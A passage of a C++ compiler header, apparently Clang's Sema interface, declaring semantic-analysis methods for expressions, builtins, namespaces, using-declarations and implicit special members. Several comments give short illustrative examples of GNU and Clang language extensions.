SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<ParsedType> ArgTypes,
ArrayRef<Expr *> ArgExprs);
ExprResult CreateGenericSelectionExpr(SourceLocation KeyLoc,
SourceLocation DefaultLoc,
SourceLocation RParenLoc,
Expr *ControllingExpr,
ArrayRef<TypeSourceInfo *> Types,
ArrayRef<Expr *> Exprs);
// Binary/Unary Operators. 'Tok' is the token for the operator.
ExprResult CreateBuiltinUnaryOp(SourceLocation OpLoc, UnaryOperatorKind Opc,
Expr *InputExpr);
ExprResult BuildUnaryOp(Scope *S, SourceLocation OpLoc,
UnaryOperatorKind Opc, Expr *Input);
ExprResult ActOnUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Op, Expr *Input);
bool isQualifiedMemberAccess(Expr *E);
QualType CheckAddressOfOperand(ExprResult &Operand, SourceLocation OpLoc);
ExprResult CreateUnaryExprOrTypeTraitExpr(TypeSourceInfo *TInfo,
SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
SourceRange R);
ExprResult CreateUnaryExprOrTypeTraitExpr(Expr *E, SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind);
ExprResult
ActOnUnaryExprOrTypeTraitExpr(SourceLocation OpLoc,
UnaryExprOrTypeTrait ExprKind,
bool IsType, void *TyOrEx,
SourceRange ArgRange);
ExprResult CheckPlaceholderExpr(Expr *E);
bool CheckVecStepExpr(Expr *E);
bool CheckUnaryExprOrTypeTraitOperand(Expr *E, UnaryExprOrTypeTrait ExprKind);
bool CheckUnaryExprOrTypeTraitOperand(QualType ExprType, SourceLocation OpLoc,
SourceRange ExprRange,
UnaryExprOrTypeTrait ExprKind);
ExprResult ActOnSizeofParameterPackExpr(Scope *S,
SourceLocation OpLoc,
IdentifierInfo &Name,
SourceLocation NameLoc,
SourceLocation RParenLoc);
ExprResult ActOnPostfixUnaryOp(Scope *S, SourceLocation OpLoc,
tok::TokenKind Kind, Expr *Input);
ExprResult ActOnArraySubscriptExpr(Scope *S, Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult CreateBuiltinArraySubscriptExpr(Expr *Base, SourceLocation LLoc,
Expr *Idx, SourceLocation RLoc);
ExprResult ActOnOMPArraySectionExpr(Expr *Base, SourceLocation LBLoc,
Expr *LowerBound, SourceLocation ColonLoc,
Expr *Length, SourceLocation RBLoc);
// This struct is for use by ActOnMemberAccess to allow
// BuildMemberReferenceExpr to reinvoke ActOnMemberAccess after
// changing the access operator from a '.' to a '->' (to see if that is the
// change needed to fix an error about an unknown member, e.g. when the class
// defines a custom operator->).
struct ActOnMemberAccessExtraArgs {
Scope *S;
UnqualifiedId &Id;
Decl *ObjCImpDecl;
};
ExprResult BuildMemberReferenceExpr(
Expr *Base, QualType BaseType, SourceLocation OpLoc, bool IsArrow,
CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult
BuildMemberReferenceExpr(Expr *Base, QualType BaseType, SourceLocation OpLoc,
bool IsArrow, const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope, LookupResult &R,
const TemplateArgumentListInfo *TemplateArgs,
const Scope *S,
bool SuppressQualifierCheck = false,
ActOnMemberAccessExtraArgs *ExtraArgs = nullptr);
ExprResult BuildFieldReferenceExpr(Expr *BaseExpr, bool IsArrow,
SourceLocation OpLoc,
const CXXScopeSpec &SS, FieldDecl *Field,
DeclAccessPair FoundDecl,
const DeclarationNameInfo &MemberNameInfo);
ExprResult PerformMemberExprBaseConversion(Expr *Base, bool IsArrow);
bool CheckQualifiedMemberReference(Expr *BaseExpr, QualType BaseType,
const CXXScopeSpec &SS,
const LookupResult &R);
ExprResult ActOnDependentMemberExpr(Expr *Base, QualType BaseType,
bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
NamedDecl *FirstQualifierInScope,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult ActOnMemberAccessExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Member,
Decl *ObjCImpDecl);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
const CXXScopeSpec *SS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
MemberExpr *
BuildMemberExpr(Expr *Base, bool IsArrow, SourceLocation OpLoc,
NestedNameSpecifierLoc NNS, SourceLocation TemplateKWLoc,
ValueDecl *Member, DeclAccessPair FoundDecl,
bool HadMultipleCandidates,
const DeclarationNameInfo &MemberNameInfo, QualType Ty,
ExprValueKind VK, ExprObjectKind OK,
const TemplateArgumentListInfo *TemplateArgs = nullptr);
void ActOnDefaultCtorInitializers(Decl *CDtorDecl);
bool ConvertArgumentsForCall(CallExpr *Call, Expr *Fn,
FunctionDecl *FDecl,
const FunctionProtoType *Proto,
ArrayRef<Expr *> Args,
SourceLocation RParenLoc,
bool ExecConfig = false);
void CheckStaticArrayArgument(SourceLocation CallLoc,
ParmVarDecl *Param,
const Expr *ArgExpr);
/// ActOnCallExpr - Handle a call to Fn with the specified array of arguments.
/// This provides the location of the left/right parens and a list of comma
/// locations.
ExprResult ActOnCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr);
ExprResult BuildCallExpr(Scope *S, Expr *Fn, SourceLocation LParenLoc,
MultiExprArg ArgExprs, SourceLocation RParenLoc,
Expr *ExecConfig = nullptr,
bool IsExecConfig = false);
enum class AtomicArgumentOrder { API, AST };
ExprResult
BuildAtomicExpr(SourceRange CallRange, SourceRange ExprRange,
SourceLocation RParenLoc, MultiExprArg Args,
AtomicExpr::AtomicOp Op,
AtomicArgumentOrder ArgOrder = AtomicArgumentOrder::API);
ExprResult
BuildResolvedCallExpr(Expr *Fn, NamedDecl *NDecl, SourceLocation LParenLoc,
ArrayRef<Expr *> Arg, SourceLocation RParenLoc,
Expr *Config = nullptr, bool IsExecConfig = false,
ADLCallKind UsesADL = ADLCallKind::NotADL);
ExprResult ActOnCUDAExecConfigExpr(Scope *S, SourceLocation LLLLoc,
MultiExprArg ExecConfig,
SourceLocation GGGLoc);
ExprResult ActOnCastExpr(Scope *S, SourceLocation LParenLoc,
Declarator &D, ParsedType &Ty,
SourceLocation RParenLoc, Expr *CastExpr);
ExprResult BuildCStyleCastExpr(SourceLocation LParenLoc,
TypeSourceInfo *Ty,
SourceLocation RParenLoc,
Expr *Op);
CastKind PrepareScalarCast(ExprResult &src, QualType destType);
/// Build an altivec or OpenCL literal.
ExprResult BuildVectorLiteral(SourceLocation LParenLoc,
SourceLocation RParenLoc, Expr *E,
TypeSourceInfo *TInfo);
ExprResult MaybeConvertParenListExprToParenExpr(Scope *S, Expr *ME);
ExprResult ActOnCompoundLiteral(SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc,
Expr *InitExpr);
ExprResult BuildCompoundLiteralExpr(SourceLocation LParenLoc,
TypeSourceInfo *TInfo,
SourceLocation RParenLoc,
Expr *LiteralExpr);
ExprResult ActOnInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult BuildInitList(SourceLocation LBraceLoc,
MultiExprArg InitArgList,
SourceLocation RBraceLoc);
ExprResult ActOnDesignatedInitializer(Designation &Desig,
SourceLocation EqualOrColonLoc,
bool GNUSyntax,
ExprResult Init);
private:
static BinaryOperatorKind ConvertTokenKindToBinaryOpcode(tok::TokenKind Kind);
public:
ExprResult ActOnBinOp(Scope *S, SourceLocation TokLoc,
tok::TokenKind Kind, Expr *LHSExpr, Expr *RHSExpr);
ExprResult BuildBinOp(Scope *S, SourceLocation OpLoc,
BinaryOperatorKind Opc, Expr *LHSExpr, Expr *RHSExpr);
ExprResult CreateBuiltinBinOp(SourceLocation OpLoc, BinaryOperatorKind Opc,
Expr *LHSExpr, Expr *RHSExpr);
void DiagnoseCommaOperator(const Expr *LHS, SourceLocation Loc);
/// ActOnConditionalOp - Parse a ?: operation. Note that 'LHS' may be null
/// in the case of the GNU conditional expr extension.
ExprResult ActOnConditionalOp(SourceLocation QuestionLoc,
SourceLocation ColonLoc,
Expr *CondExpr, Expr *LHSExpr, Expr *RHSExpr);
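// Illustrative sketch (not part of this interface): the null-'LHS' case above
// corresponds to the GNU extension that omits the middle operand, which
// evaluates the condition only once:
//
//   int pick(int a, int b) { return a ?: b; }  // same as a ? a : b, but 'a'
//                                              // is evaluated a single time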
/// ActOnAddrLabel - Parse the GNU address-of-label extension: "&&foo".
ExprResult ActOnAddrLabel(SourceLocation OpLoc, SourceLocation LabLoc,
LabelDecl *TheDecl);
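// Illustrative sketch (not part of this interface): the labels-as-values
// extension handled here, paired with GNU computed goto:
//
//   void dispatch(int i) {
//     void *target = i ? &&yes : &&no;  // '&&label' has type 'void *'
//     goto *target;
//   yes:
//     return;
//   no:
//     return;
//   }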
void ActOnStartStmtExpr();
ExprResult ActOnStmtExpr(SourceLocation LPLoc, Stmt *SubStmt,
SourceLocation RPLoc); // "({..})"
// Handle the final expression in a statement expression.
ExprResult ActOnStmtExprResult(ExprResult E);
void ActOnStmtExprError();
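// Illustrative sketch (not part of this interface): a GNU statement
// expression; its value is that of the last expression in the braces, which
// is what ActOnStmtExprResult handles. Statement expressions are only valid
// inside a function body:
//
//   #define SQUARE(x) ({ __typeof__(x) t_ = (x); t_ * t_; })
//   int nine() { return SQUARE(3); }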
// __builtin_offsetof(type, identifier(.identifier|[expr])*)
struct OffsetOfComponent {
SourceLocation LocStart, LocEnd;
bool isBrackets; // true if [expr], false if .ident
union {
IdentifierInfo *IdentInfo;
Expr *E;
} U;
};
/// __builtin_offsetof(type, a.b[123][456].c)
ExprResult BuildBuiltinOffsetOf(SourceLocation BuiltinLoc,
TypeSourceInfo *TInfo,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
ExprResult ActOnBuiltinOffsetOf(Scope *S,
SourceLocation BuiltinLoc,
SourceLocation TypeLoc,
ParsedType ParsedArgTy,
ArrayRef<OffsetOfComponent> Components,
SourceLocation RParenLoc);
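// Illustrative sketch (not part of this interface): each designator after the
// type becomes one OffsetOfComponent ('.b' and '[2]' below):
//
//   struct S { int a; int b[4]; };
//   enum { Off = __builtin_offsetof(S, b[2]) };  // offsetof(S, b) + 2 * sizeof(int)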
// __builtin_choose_expr(constExpr, expr1, expr2)
ExprResult ActOnChooseExpr(SourceLocation BuiltinLoc,
Expr *CondExpr, Expr *LHSExpr,
Expr *RHSExpr, SourceLocation RPLoc);
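// Illustrative sketch (not part of this interface), assuming a compiler that
// provides this builtin: the condition must be a constant expression, and the
// result has exactly the type and value of the chosen operand:
//
//   int bits = __builtin_choose_expr(sizeof(long) == 8, 64, 32);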
// __builtin_va_arg(expr, type)
ExprResult ActOnVAArg(SourceLocation BuiltinLoc, Expr *E, ParsedType Ty,
SourceLocation RPLoc);
ExprResult BuildVAArgExpr(SourceLocation BuiltinLoc, Expr *E,
TypeSourceInfo *TInfo, SourceLocation RPLoc);
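// Illustrative sketch (not part of this interface), using the builtin
// va_list forms directly so no header is needed:
//
//   int sum(int n, ...) {
//     __builtin_va_list ap;
//     __builtin_va_start(ap, n);
//     int s = 0;
//     for (int i = 0; i < n; ++i)
//       s += __builtin_va_arg(ap, int);  // the expression handled above
//     __builtin_va_end(ap);
//     return s;
//   }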
// __builtin_LINE(), __builtin_FUNCTION(), __builtin_FILE(),
// __builtin_COLUMN()
ExprResult ActOnSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc,
SourceLocation RPLoc);
// Build a potentially resolved SourceLocExpr.
ExprResult BuildSourceLocExpr(SourceLocExpr::IdentKind Kind,
SourceLocation BuiltinLoc, SourceLocation RPLoc,
DeclContext *ParentContext);
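// Illustrative sketch (not part of this interface): when one of these
// builtins appears in a default argument, it is rebuilt at each call site,
// which is why BuildSourceLocExpr is given the ParentContext explicitly:
//
//   unsigned current_line(unsigned l = __builtin_LINE()) { return l; }
//   // every caller of current_line() observes its own line number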
// __null
ExprResult ActOnGNUNullExpr(SourceLocation TokenLoc);
bool CheckCaseExpression(Expr *E);
/// Describes the result of an "if-exists" condition check.
enum IfExistsResult {
/// The symbol exists.
IER_Exists,
/// The symbol does not exist.
IER_DoesNotExist,
/// The name is a dependent name, so the results will differ
/// from one instantiation to the next.
IER_Dependent,
/// An error occurred.
IER_Error
};
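// Illustrative sketch (not part of this interface), assuming Clang with
// -fms-extensions (or MSVC): inside a template, the probe below is
// IER_Dependent until instantiation, after which exactly one branch remains:
//
//   struct S { void f(); };
//   template <typename T> int probe(T &) {
//     __if_exists(T::f) { return 1; }
//     __if_not_exists(T::f) { return 0; }
//   }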
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, CXXScopeSpec &SS,
const DeclarationNameInfo &TargetNameInfo);
IfExistsResult
CheckMicrosoftIfExistsSymbol(Scope *S, SourceLocation KeywordLoc,
bool IsIfExists, CXXScopeSpec &SS,
UnqualifiedId &Name);
StmtResult BuildMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
NestedNameSpecifierLoc QualifierLoc,
DeclarationNameInfo NameInfo,
Stmt *Nested);
StmtResult ActOnMSDependentExistsStmt(SourceLocation KeywordLoc,
bool IsIfExists,
CXXScopeSpec &SS, UnqualifiedId &Name,
Stmt *Nested);
//===------------------------- "Block" Extension ------------------------===//
/// ActOnBlockStart - This callback is invoked when a block literal is
/// started.
void ActOnBlockStart(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockArguments - This callback allows processing of block arguments.
/// If there are no arguments, this is still invoked.
void ActOnBlockArguments(SourceLocation CaretLoc, Declarator &ParamInfo,
Scope *CurScope);
/// ActOnBlockError - If there is an error parsing a block, this callback
/// is invoked to pop the information about the block from the action impl.
void ActOnBlockError(SourceLocation CaretLoc, Scope *CurScope);
/// ActOnBlockStmtExpr - This is called when the body of a block statement
/// literal was successfully completed. ^(int x){...}
ExprResult ActOnBlockStmtExpr(SourceLocation CaretLoc, Stmt *Body,
Scope *CurScope);
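// Illustrative sketch (not part of this interface), assuming Clang with
// -fblocks (plus a blocks runtime when linking on non-Darwin targets):
//
//   int run() {
//     int (^add)(int, int) = ^(int a, int b) { return a + b; };
//     return add(1, 2);  // calls the block literal through the block pointer
//   }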
//===---------------------------- Clang Extensions ----------------------===//
/// __builtin_convertvector(...)
ExprResult ActOnConvertVectorExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
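// Illustrative sketch (not part of this interface), assuming Clang's
// ext_vector_type attribute: __builtin_convertvector performs an element-wise
// conversion between vector types with the same number of elements:
//
//   typedef float float4 __attribute__((ext_vector_type(4)));
//   typedef int   int4   __attribute__((ext_vector_type(4)));
//   int4 truncate(float4 v) { return __builtin_convertvector(v, int4); }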
//===---------------------------- OpenCL Features -----------------------===//
/// __builtin_astype(...)
ExprResult ActOnAsTypeExpr(Expr *E, ParsedType ParsedDestTy,
SourceLocation BuiltinLoc,
SourceLocation RParenLoc);
//===---------------------------- C++ Features --------------------------===//
// Act on C++ namespaces
Decl *ActOnStartNamespaceDef(Scope *S, SourceLocation InlineLoc,
SourceLocation NamespaceLoc,
SourceLocation IdentLoc, IdentifierInfo *Ident,
SourceLocation LBrace,
const ParsedAttributesView &AttrList,
UsingDirectiveDecl *&UsingDecl);
void ActOnFinishNamespaceDef(Decl *Dcl, SourceLocation RBrace);
NamespaceDecl *getStdNamespace() const;
NamespaceDecl *getOrCreateStdNamespace();
NamespaceDecl *lookupStdExperimentalNamespace();
CXXRecordDecl *getStdBadAlloc() const;
EnumDecl *getStdAlignValT() const;
private:
// A cache representing whether we've fully checked the various comparison
// category types stored in ASTContext. The bit-index corresponds to the
// integer value of a ComparisonCategoryType enumerator.
llvm::SmallBitVector FullyCheckedComparisonCategories;
ValueDecl *tryLookupCtorInitMemberDecl(CXXRecordDecl *ClassDecl,
CXXScopeSpec &SS,
ParsedType TemplateTypeTy,
IdentifierInfo *MemberOrBase);
public:
enum class ComparisonCategoryUsage {
/// The '<=>' operator was used in an expression and a builtin operator
/// was selected.
OperatorInExpression,
/// A defaulted 'operator<=>' needed the comparison category. This
/// typically only applies to 'std::strong_ordering', due to the implicit
/// fallback return value.
DefaultedOperator,
};
/// Lookup the specified comparison category types in the standard
/// library, and check the VarDecls possibly returned by the operator<=>
/// builtins for that type.
///
/// \return The type of the comparison category type corresponding to the
/// specified Kind, or a null type if an error occurs
QualType CheckComparisonCategoryType(ComparisonCategoryType Kind,
SourceLocation Loc,
ComparisonCategoryUsage Usage);
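// Illustrative sketch (not part of this interface): a defaulted 'operator<=>'
// is the DefaultedOperator usage above; for two int members the category
// looked up is std::strong_ordering:
//
//   #include <compare>
//   struct P {
//     int x, y;
//     auto operator<=>(const P &) const = default;
//   };
//   static_assert(P{1, 2} < P{1, 3});  // '<' is rewritten via the defaulted <=>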
/// Tests whether Ty is an instance of std::initializer_list and, if
/// it is and Element is not NULL, assigns the element type to Element.
bool isStdInitializerList(QualType Ty, QualType *Element);
/// Looks for the std::initializer_list template and instantiates it
/// with Element, or emits an error if it's not found.
///
/// \returns The instantiated template, or null on error.
QualType BuildStdInitializerList(QualType Element, SourceLocation Loc);
/// Determine whether Ctor is an initializer-list constructor, as
/// defined in [dcl.init.list]p2.
bool isInitListConstructor(const FunctionDecl *Ctor);
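// Illustrative sketch (not part of this interface): the constructor below is
// an initializer-list constructor in the [dcl.init.list]p2 sense, so
// list-initialization prefers it over other constructors:
//
//   #include <cstddef>
//   #include <initializer_list>
//   struct Buf {
//     Buf(std::initializer_list<int> il) : n(il.size()) {}
//     std::size_t n;
//   };
//   Buf b{1, 2, 3};  // n == 3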
Decl *ActOnUsingDirective(Scope *CurScope, SourceLocation UsingLoc,
SourceLocation NamespcLoc, CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *NamespcName,
const ParsedAttributesView &AttrList);
void PushUsingDirective(Scope *S, UsingDirectiveDecl *UDir);
Decl *ActOnNamespaceAliasDef(Scope *CurScope,
SourceLocation NamespaceLoc,
SourceLocation AliasLoc,
IdentifierInfo *Alias,
CXXScopeSpec &SS,
SourceLocation IdentLoc,
IdentifierInfo *Ident);
void HideUsingShadowDecl(Scope *S, UsingShadowDecl *Shadow);
bool CheckUsingShadowDecl(UsingDecl *UD, NamedDecl *Target,
const LookupResult &PreviousDecls,
UsingShadowDecl *&PrevShadow);
UsingShadowDecl *BuildUsingShadowDecl(Scope *S, UsingDecl *UD,
NamedDecl *Target,
UsingShadowDecl *PrevDecl);
bool CheckUsingDeclRedeclaration(SourceLocation UsingLoc,
bool HasTypenameKeyword,
const CXXScopeSpec &SS,
SourceLocation NameLoc,
const LookupResult &Previous);
bool CheckUsingDeclQualifier(SourceLocation UsingLoc,
bool HasTypename,
const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
SourceLocation NameLoc);
NamedDecl *BuildUsingDeclaration(
Scope *S, AccessSpecifier AS, SourceLocation UsingLoc,
bool HasTypenameKeyword, SourceLocation TypenameLoc, CXXScopeSpec &SS,
DeclarationNameInfo NameInfo, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList, bool IsInstantiation);
NamedDecl *BuildUsingPackDecl(NamedDecl *InstantiatedFrom,
ArrayRef<NamedDecl *> Expansions);
bool CheckInheritingConstructorUsingDecl(UsingDecl *UD);
/// Given a derived-class using shadow declaration for a constructor and the
/// corresponding base class constructor, find or create the implicit
/// synthesized derived class constructor to use for this initialization.
CXXConstructorDecl *
findInheritingConstructor(SourceLocation Loc, CXXConstructorDecl *BaseCtor,
ConstructorUsingShadowDecl *DerivedShadow);
Decl *ActOnUsingDeclaration(Scope *CurScope, AccessSpecifier AS,
SourceLocation UsingLoc,
SourceLocation TypenameLoc, CXXScopeSpec &SS,
UnqualifiedId &Name, SourceLocation EllipsisLoc,
const ParsedAttributesView &AttrList);
Decl *ActOnAliasDeclaration(Scope *CurScope, AccessSpecifier AS,
MultiTemplateParamsArg TemplateParams,
SourceLocation UsingLoc, UnqualifiedId &Name,
const ParsedAttributesView &AttrList,
TypeResult Type, Decl *DeclFromDeclSpec);
/// BuildCXXConstructExpr - Creates a complete call to a constructor,
/// including handling of its default argument expressions.
///
/// \param ConstructKind - a CXXConstructExpr::ConstructionKind
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
/// Build a CXXConstructExpr whose constructor has already been resolved if
/// it denotes an inherited constructor.
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs,
bool HadMultipleCandidates, bool IsListInitialization,
bool IsStdInitListInitialization,
bool RequiresZeroInit, unsigned ConstructKind,
SourceRange ParenRange);
// FIXME: Can we remove this and have the above BuildCXXConstructExpr check if
// the constructor can be elidable?
ExprResult
BuildCXXConstructExpr(SourceLocation ConstructLoc, QualType DeclInitType,
NamedDecl *FoundDecl,
CXXConstructorDecl *Constructor, bool Elidable,
MultiExprArg Exprs, bool HadMultipleCandidates,
bool IsListInitialization,
bool IsStdInitListInitialization, bool RequiresZeroInit,
unsigned ConstructKind, SourceRange ParenRange);
ExprResult BuildCXXDefaultInitExpr(SourceLocation Loc, FieldDecl *Field);
/// Instantiate or parse a C++ default argument expression as necessary.
/// Return true on error.
bool CheckCXXDefaultArgExpr(SourceLocation CallLoc, FunctionDecl *FD,
ParmVarDecl *Param);
/// BuildCXXDefaultArgExpr - Creates a CXXDefaultArgExpr, instantiating
/// the default expr if needed.
ExprResult BuildCXXDefaultArgExpr(SourceLocation CallLoc,
FunctionDecl *FD,
ParmVarDecl *Param);
/// FinalizeVarWithDestructor - Prepare for calling destructor on the
/// constructed variable.
void FinalizeVarWithDestructor(VarDecl *VD, const RecordType *DeclInitType);
/// Helper class that collects exception specifications for
/// implicitly-declared special member functions.
class ImplicitExceptionSpecification {
// Pointer to allow copying
Sema *Self;
// We order exception specifications thus:
// noexcept is the most restrictive, but is only used in C++11.
// throw() comes next.
// Then a throw(collected exceptions).
// Finally, no specification, which is expressed as noexcept(false).
// throw(...) is used instead if any called function uses it.
ExceptionSpecificationType ComputedEST;
llvm::SmallPtrSet<CanQualType, 4> ExceptionsSeen;
SmallVector<QualType, 4> Exceptions;
void ClearExceptions() {
ExceptionsSeen.clear();
Exceptions.clear();
}
public:
explicit ImplicitExceptionSpecification(Sema &Self)
: Self(&Self), ComputedEST(EST_BasicNoexcept) {
if (!Self.getLangOpts().CPlusPlus11)
ComputedEST = EST_DynamicNone;
}
/// Get the computed exception specification type.
ExceptionSpecificationType getExceptionSpecType() const {
assert(!isComputedNoexcept(ComputedEST) &&
"noexcept(expr) should not be a possible result");
return ComputedEST;
}
/// The number of exceptions in the exception specification.
unsigned size() const { return Exceptions.size(); }
/// The set of exceptions in the exception specification.
const QualType *data() const { return Exceptions.data(); }
/// Integrate another called method into the collected data.
void CalledDecl(SourceLocation CallLoc, const CXXMethodDecl *Method);
/// Integrate an invoked expression into the collected data.
void CalledExpr(Expr *E) { CalledStmt(E); }
/// Integrate an invoked statement into the collected data.
void CalledStmt(Stmt *S);
/// Overwrite an EPI's exception specification with this
/// computed exception specification.
FunctionProtoType::ExceptionSpecInfo getExceptionSpec() const {
FunctionProtoType::ExceptionSpecInfo ESI;
ESI.Type = getExceptionSpecType();
if (ESI.Type == EST_Dynamic) {
ESI.Exceptions = Exceptions;
} else if (ESI.Type == EST_None) {
/// C++11 [except.spec]p14:
/// The exception-specification is noexcept(false) if the set of
/// potential exceptions of the special member function contains "any"
ESI.Type = EST_NoexceptFalse;
ESI.NoexceptExpr = Self->ActOnCXXBoolLiteral(SourceLocation(),
tok::kw_false).get();
}
return ESI;
}
};
/// Determine what sort of exception specification a defaulted
/// default constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDefaultCtorExceptionSpec(SourceLocation Loc,
CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy constructor of a class will have, and whether the parameter
/// will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// copy assignment operator of a class will have, and whether the
/// parameter will be const.
ImplicitExceptionSpecification
ComputeDefaultedCopyAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveCtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted move
/// assignment operator of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedMoveAssignmentExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification a defaulted
/// destructor of a class will have.
ImplicitExceptionSpecification
ComputeDefaultedDtorExceptionSpec(CXXMethodDecl *MD);
/// Determine what sort of exception specification an inheriting
/// constructor of a class will have.
ImplicitExceptionSpecification
ComputeInheritingCtorExceptionSpec(SourceLocation Loc,
CXXConstructorDecl *CD);
/// Evaluate the implicit exception specification for a defaulted
/// special member function.
void EvaluateImplicitExceptionSpec(SourceLocation Loc, FunctionDecl *FD);
/// Check the given noexcept-specifier, convert its expression, and compute
/// the appropriate ExceptionSpecificationType.
ExprResult ActOnNoexceptSpec(SourceLocation NoexceptLoc, Expr *NoexceptExpr,
ExceptionSpecificationType &EST);
/// Check the given exception-specification and update the
/// exception specification information with the results.
void checkExceptionSpecification(bool IsTopLevel,
ExceptionSpecificationType EST,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr,
SmallVectorImpl<QualType> &Exceptions,
FunctionProtoType::ExceptionSpecInfo &ESI);
/// Determine if we're in a case where we need to (incorrectly) eagerly
/// parse an exception specification to work around a libstdc++ bug.
bool isLibstdcxxEagerExceptionSpecHack(const Declarator &D);
/// Add an exception-specification to the given member function
/// (or member function template). The exception-specification was parsed
/// after the method itself was declared.
void actOnDelayedExceptionSpecification(Decl *Method,
ExceptionSpecificationType EST,
SourceRange SpecificationRange,
ArrayRef<ParsedType> DynamicExceptions,
ArrayRef<SourceRange> DynamicExceptionRanges,
Expr *NoexceptExpr);
class InheritedConstructorInfo;
/// Determine if a special member function should have a deleted
/// definition when it is defaulted.
bool ShouldDeleteSpecialMember(CXXMethodDecl *MD, CXXSpecialMember CSM,
InheritedConstructorInfo *ICI = nullptr,
bool Diagnose = false);
/// Produce notes explaining why a defaulted function was defined as deleted.
void DiagnoseDeletedDefaultedFunction(FunctionDecl *FD);
/// Declare the implicit default constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// default constructor will be added.
///
/// \returns The implicitly-declared default constructor.
CXXConstructorDecl *DeclareImplicitDefaultConstructor(
CXXRecordDecl *ClassDecl);
/// DefineImplicitDefaultConstructor - Checks for feasibility of
/// defining this constructor as the default constructor.
void DefineImplicitDefaultConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit destructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// destructor will be added.
///
/// \returns The implicitly-declared destructor.
CXXDestructorDecl *DeclareImplicitDestructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitDestructor - Checks for feasibility of
/// defining this destructor as the default destructor.
void DefineImplicitDestructor(SourceLocation CurrentLocation,
CXXDestructorDecl *Destructor);
/// Build an exception spec for destructors that don't have one.
///
/// C++11 says that user-defined destructors with no exception spec get one
/// that looks as if the destructor was implicitly declared.
void AdjustDestructorExceptionSpec(CXXDestructorDecl *Destructor);
/// Define the specified inheriting constructor.
void DefineInheritingConstructor(SourceLocation UseLoc,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy constructor for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy constructor will be added.
///
/// \returns The implicitly-declared copy constructor.
CXXConstructorDecl *DeclareImplicitCopyConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitCopyConstructor - Checks for feasibility of
/// defining this constructor as the copy constructor.
void DefineImplicitCopyConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit move constructor for the given class.
///
/// \param ClassDecl The Class declaration into which the implicit
/// move constructor will be added.
///
/// \returns The implicitly-declared move constructor, or NULL if it wasn't
/// declared.
CXXConstructorDecl *DeclareImplicitMoveConstructor(CXXRecordDecl *ClassDecl);
/// DefineImplicitMoveConstructor - Checks for feasibility of
/// defining this constructor as the move constructor.
void DefineImplicitMoveConstructor(SourceLocation CurrentLocation,
CXXConstructorDecl *Constructor);
/// Declare the implicit copy assignment operator for the given class.
///
/// \param ClassDecl The class declaration into which the implicit
/// copy assignment operator will be added.
///
/// \returns The implicitly-declared copy assignment operator.
CXXMethodDecl *DeclareImplicitCopyAssignment(CXXRecordDecl *ClassDecl);
/// Defines an implicitly-declared copy assignment operator.
